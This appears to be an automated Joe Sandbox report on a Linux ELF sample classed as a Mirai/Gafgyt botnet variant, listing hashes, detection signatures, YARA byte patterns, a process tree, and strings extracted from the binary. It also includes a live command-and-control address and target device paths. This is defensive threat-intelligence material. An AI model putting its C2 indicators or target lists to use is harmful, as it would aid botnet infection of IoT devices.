Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
rLMjh4RBTM.elf

Overview

General Information

Sample name:rLMjh4RBTM.elf
renamed because original name is a hash value
Original sample name:db952fa7284ef69e5529d888ffb2c0a4.elf
Analysis ID:1416385
MD5:db952fa7284ef69e5529d888ffb2c0a4
SHA1:7b42d0baeec869414ba0c6ecc5de06aacbfdf82e
SHA256:94cc3f5128fd5ace72d047ce4966021737f5fc4e32034838a97fadf20a18585f
Tags:32elfgafgytintel
Infos:

Detection

Mirai, Okiru
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Yara detected Okiru
Contains symbols with names commonly found in malware
Machine Learning detection for sample
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to kill multiple processes (SIGKILL)
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Reads system information from the proc file system
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are potentially command strings
Sample contains strings that are user agent strings indicative of HTTP manipulation
Sample tries to kill a process (SIGKILL)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Yara signature match

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.
Non-zero exit code suggests an error during the execution. Lookup the error code for hints.

General Information

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1416385
Start date and time:2024-03-27 11:01:10 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 7m 37s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:rLMjh4RBTM.elf
renamed because original name is a hash value
Original Sample Name:db952fa7284ef69e5529d888ffb2c0a4.elf
Detection:MAL
Classification:mal100.spre.troj.linELF@0/0@2/0

Warnings

  • Connection to analysis system has been lost, crash info: Unknown

Runtime Messages

Command:/tmp/rLMjh4RBTM.elf
PID:5490
Exit Code:116
Exit Code Info:
Killed:False
Standard Output:
hbot proc starting...
hbot proc starting...
hbot proc starting...
Standard Error:

Process Tree

  • system is lnxubuntu20
  • sh (PID: 5514, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-sharing
  • gsd-sharing (PID: 5514, Parent: 1383, MD5: e29d9025d98590fbb69f89fdbd4438b3) Arguments: /usr/libexec/gsd-sharing
  • sh (PID: 5519, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-wacom
  • gsd-wacom (PID: 5519, Parent: 1383, MD5: 13778dd1a23a4e94ddc17ac9caa4fcc1) Arguments: /usr/libexec/gsd-wacom
  • sh (PID: 5521, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-keyboard
  • gsd-keyboard (PID: 5521, Parent: 1383, MD5: 8e288fd17c80bb0a1148b964b2ac2279) Arguments: /usr/libexec/gsd-keyboard
  • sh (PID: 5524, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • gsd-print-notifications (PID: 5524, Parent: 1383, MD5: 71539698aa691718cee775d6b9450ae2) Arguments: /usr/libexec/gsd-print-notifications
  • systemd New Fork (PID: 5525, Parent: 1)
  • upowerd (PID: 5525, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • sh (PID: 5544, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
  • gsd-rfkill (PID: 5544, Parent: 1383, MD5: 88a16a3c0aba1759358c06215ecfb5cc) Arguments: /usr/libexec/gsd-rfkill
  • fusermount (PID: 5566, Parent: 3147, MD5: 576a1b135c82bdcbc97a91acea900566) Arguments: fusermount -u -q -z -- /run/user/1000/gvfs
  • sh (PID: 5567, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-smartcard
  • gsd-smartcard (PID: 5567, Parent: 1383, MD5: ea1fbd7f62e4cd0331eae2ef754ee605) Arguments: /usr/libexec/gsd-smartcard
  • sh (PID: 5568, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-color
  • gsd-color (PID: 5568, Parent: 1383, MD5: ac2861ad93ce047283e8e87cefef9a19) Arguments: /usr/libexec/gsd-color
  • sh (PID: 5569, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-datetime
  • gsd-datetime (PID: 5569, Parent: 1383, MD5: d80d39745740de37d6634d36e344d4bc) Arguments: /usr/libexec/gsd-datetime
  • wrapper-2.0 (PID: 5571, Parent: 3172, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • sh (PID: 5572, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-media-keys
  • gsd-media-keys (PID: 5572, Parent: 1383, MD5: a425448c135afb4b8bfd79cc0b6b74da) Arguments: /usr/libexec/gsd-media-keys
  • wrapper-2.0 (PID: 5573, Parent: 3172, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • sh (PID: 5574, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-screensaver-proxy
  • gsd-screensaver-proxy (PID: 5574, Parent: 1383, MD5: 77e309450c87dceee43f1a9e50cc0d02) Arguments: /usr/libexec/gsd-screensaver-proxy
  • wrapper-2.0 (PID: 5594, Parent: 3172, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • sh (PID: 5595, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-a11y-settings
  • gsd-a11y-settings (PID: 5595, Parent: 1383, MD5: 18e243d2cf30ecee7ea89d1462725c5c) Arguments: /usr/libexec/gsd-a11y-settings
  • wrapper-2.0 (PID: 5596, Parent: 3172, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • sh (PID: 5601, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-sound
  • gsd-sound (PID: 5601, Parent: 1383, MD5: 4c7d3fb993463337b4a0eb5c80c760ee) Arguments: /usr/libexec/gsd-sound
  • wrapper-2.0 (PID: 5602, Parent: 3172, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • sh (PID: 5603, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
  • gsd-housekeeping (PID: 5603, Parent: 1383, MD5: b55f3394a84976ddb92a2915e5d76914) Arguments: /usr/libexec/gsd-housekeeping
  • sh (PID: 5604, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-power
  • gsd-power (PID: 5604, Parent: 1383, MD5: 28b8e1b43c3e7f1db6741ea1ecd978b7) Arguments: /usr/libexec/gsd-power
  • wrapper-2.0 (PID: 5607, Parent: 3172, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • systemd New Fork (PID: 5613, Parent: 1)
  • upowerd (PID: 5613, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • systemd New Fork (PID: 5654, Parent: 1)
  • upowerd (PID: 5654, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • systemd New Fork (PID: 5702, Parent: 1)
  • upowerd (PID: 5702, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • systemd New Fork (PID: 5765, Parent: 1)
  • upowerd (PID: 5765, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • systemd New Fork (PID: 5829, Parent: 1)
  • upowerd (PID: 5829, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • systemd New Fork (PID: 5871, Parent: 1)
  • upowerd (PID: 5871, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • systemd New Fork (PID: 5911, Parent: 1)
  • upowerd (PID: 5911, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • systemd New Fork (PID: 5958, Parent: 1)
  • upowerd (PID: 5958, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
rLMjh4RBTM.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    rLMjh4RBTM.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
    • 0xa9a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0xa9b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0xa9cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0xa9e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0xa9f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0xaa08:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0xaa1c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0xaa30:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0xaa44:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0xaa58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0xaa6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0xaa80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0xaa94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0xaaa8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0xaabc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0xaad0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0xaae4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0xaaf8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0xab0c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0xab20:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0xab34:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    rLMjh4RBTM.elfLinux_Trojan_Mirai_122ff2e6unknownunknown
    • 0x5cef:$a: 24 EB 15 89 F0 83 C8 01 EB 03 8B 5B 08 3B 43 04 72 F8 8B 4B 0C 89
    rLMjh4RBTM.elfLinux_Trojan_Mirai_fa48b592unknownunknown
    • 0x9d29:$a: 31 C0 BA 01 00 00 00 B9 01 00 00 00 03 04 24 89 D7 31 D2 F7 F7 0F

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    5610.1.0000000008048000.0000000008057000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      5610.1.0000000008048000.0000000008057000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0xa9a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xa9b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xa9cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xa9e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xa9f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xaa08:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xaa1c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xaa30:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xaa44:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xaa58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xaa6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xaa80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xaa94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xaaa8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xaabc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xaad0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xaae4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xaaf8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xab0c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xab20:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xab34:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      5610.1.0000000008048000.0000000008057000.r-x.sdmpLinux_Trojan_Mirai_122ff2e6unknownunknown
      • 0x5cef:$a: 24 EB 15 89 F0 83 C8 01 EB 03 8B 5B 08 3B 43 04 72 F8 8B 4B 0C 89
      5610.1.0000000008048000.0000000008057000.r-x.sdmpLinux_Trojan_Mirai_fa48b592unknownunknown
      • 0x9d29:$a: 31 C0 BA 01 00 00 00 B9 01 00 00 00 03 04 24 89 D7 31 D2 F7 F7 0F
      5570.1.0000000008048000.0000000008057000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        Click to see the 31 entries

        Snort Signatures

        Timestamp:03/27/24-11:01:49.955013
        SID:2848902
        Source Port:667
        Destination Port:47866
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: rLMjh4RBTM.elfAvira: detected
        Multi AV Scanner detection for submitted file
        Source: rLMjh4RBTM.elfReversingLabs: Detection: 55%
        Source: rLMjh4RBTM.elfVirustotal: Detection: 58%Perma Link
        Machine Learning detection for sample
        Source: rLMjh4RBTM.elfJoe Sandbox ML: detected
        Source: rLMjh4RBTM.elfString: 2surf2vhoi2h{h2surf2/proc//exe//fd/socketprocselfmil/lib//usr/bin//usr/sbin/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdusr/shellmnt/sys/boot/media/srv/var/run/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshdbashhttpdtelnetddropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/mipsel.nnmips.nnarm.nnarm5.nnarm6.nnarm7.nnx86_32.nnwget/.curlhttparmmipsanko-app/ankosample _8182T_1104/usr/libexec/openssh/sftp-serverUnable To Connect to Target: %s:%d

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2848902 ETPRO TROJAN ELF/Mirai Variant CnC Command Inbound 139.59.88.74:667 -> 192.168.2.14:47866
        Source: global trafficTCP traffic: 192.168.2.14:47866 -> 139.59.88.74:667
        Source: global trafficTCP traffic: 192.168.2.14:46540 -> 185.125.190.26:443
        Source: unknownTCP traffic detected without corresponding DNS query: 139.59.88.74
        Source: unknownTCP traffic detected without corresponding DNS query: 139.59.88.74
        Source: unknownTCP traffic detected without corresponding DNS query: 139.59.88.74
        Source: unknownTCP traffic detected without corresponding DNS query: 180.249.14.121
        Source: unknownTCP traffic detected without corresponding DNS query: 147.67.11.121
        Source: unknownTCP traffic detected without corresponding DNS query: 178.76.11.121
        Source: unknownTCP traffic detected without corresponding DNS query: 149.246.14.121
        Source: unknownTCP traffic detected without corresponding DNS query: 89.99.195.119
        Source: unknownTCP traffic detected without corresponding DNS query: 25.25.186.119
        Source: unknownTCP traffic detected without corresponding DNS query: 37.243.14.121
        Source: unknownTCP traffic detected without corresponding DNS query: 246.142.187.21
        Source: unknownTCP traffic detected without corresponding DNS query: 65.157.170.252
        Source: unknownTCP traffic detected without corresponding DNS query: 141.102.230.85
        Source: unknownTCP traffic detected without corresponding DNS query: 177.88.11.52
        Source: unknownTCP traffic detected without corresponding DNS query: 249.158.227.156
        Source: unknownTCP traffic detected without corresponding DNS query: 181.38.106.240
        Source: unknownTCP traffic detected without corresponding DNS query: 23.122.254.112
        Source: unknownTCP traffic detected without corresponding DNS query: 105.106.94.30
        Source: unknownTCP traffic detected without corresponding DNS query: 207.112.166.127
        Source: unknownTCP traffic detected without corresponding DNS query: 81.82.128.16
        Source: unknownTCP traffic detected without corresponding DNS query: 46.67.121.252
        Source: unknownTCP traffic detected without corresponding DNS query: 15.218.74.231
        Source: unknownTCP traffic detected without corresponding DNS query: 143.143.97.11
        Source: unknownTCP traffic detected without corresponding DNS query: 254.221.55.61
        Source: unknownTCP traffic detected without corresponding DNS query: 245.226.28.140
        Source: unknownTCP traffic detected without corresponding DNS query: 253.59.28.158
        Source: unknownTCP traffic detected without corresponding DNS query: 70.194.6.153
        Source: unknownTCP traffic detected without corresponding DNS query: 181.36.93.26
        Source: unknownTCP traffic detected without corresponding DNS query: 65.102.61.113
        Source: unknownTCP traffic detected without corresponding DNS query: 72.120.129.14
        Source: unknownTCP traffic detected without corresponding DNS query: 44.159.58.161
        Source: unknownTCP traffic detected without corresponding DNS query: 50.127.177.82
        Source: unknownTCP traffic detected without corresponding DNS query: 75.20.36.200
        Source: unknownTCP traffic detected without corresponding DNS query: 63.118.98.205
        Source: unknownTCP traffic detected without corresponding DNS query: 64.83.212.184
        Source: unknownTCP traffic detected without corresponding DNS query: 135.227.69.97
        Source: unknownTCP traffic detected without corresponding DNS query: 168.37.43.137
        Source: unknownTCP traffic detected without corresponding DNS query: 60.105.38.87
        Source: unknownTCP traffic detected without corresponding DNS query: 203.126.114.77
        Source: unknownTCP traffic detected without corresponding DNS query: 152.150.179.211
        Source: unknownTCP traffic detected without corresponding DNS query: 91.106.184.183
        Source: unknownTCP traffic detected without corresponding DNS query: 57.245.101.3
        Source: unknownTCP traffic detected without corresponding DNS query: 65.222.226.105
        Source: unknownTCP traffic detected without corresponding DNS query: 23.123.74.10
        Source: unknownTCP traffic detected without corresponding DNS query: 121.34.2.69
        Source: unknownTCP traffic detected without corresponding DNS query: 183.34.212.126
        Source: unknownTCP traffic detected without corresponding DNS query: 250.235.187.1
        Source: unknownTCP traffic detected without corresponding DNS query: 94.16.254.85
        Source: unknownTCP traffic detected without corresponding DNS query: 53.75.53.12
        Source: unknownTCP traffic detected without corresponding DNS query: 158.17.43.211
        Source: unknownDNS traffic detected: queries for: daisy.ubuntu.com
        Source: rLMjh4RBTM.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: rLMjh4RBTM.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
        Source: unknownNetwork traffic detected: HTTP traffic on port 46540 -> 443

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: rLMjh4RBTM.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: rLMjh4RBTM.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_122ff2e6 Author: unknown
        Source: rLMjh4RBTM.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_fa48b592 Author: unknown
        Source: 5610.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: 5610.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 Author: unknown
        Source: 5610.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 Author: unknown
        Source: 5570.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: 5570.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 Author: unknown
        Source: 5570.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 Author: unknown
        Source: 6024.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: 6024.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 Author: unknown
        Source: 6024.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 Author: unknown
        Source: 6027.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: 6027.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 Author: unknown
        Source: 6027.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 Author: unknown
        Source: 5490.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: 5490.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 Author: unknown
        Source: 5490.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 Author: unknown
        Source: 6086.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: 6086.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 Author: unknown
        Source: 6086.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 Author: unknown
        Source: Process Memory Space: rLMjh4RBTM.elf PID: 5490, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: Process Memory Space: rLMjh4RBTM.elf PID: 5570, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: Process Memory Space: rLMjh4RBTM.elf PID: 5610, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
